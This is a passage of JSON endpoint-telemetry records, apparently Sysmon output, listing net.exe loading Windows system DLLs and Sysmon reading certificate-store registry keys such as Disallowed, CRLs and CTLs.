"unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "net.exe", - "image_path": "C:\\Windows\\System32\\net.exe", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "srvcli.dll", - "image_path": "C:\\Windows\\System32\\srvcli.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\My", - "registry_value": "My", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": 
"{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 
2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "vmhgfs.dll", - "image_path": "C:\\Windows\\System32\\vmhgfs.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
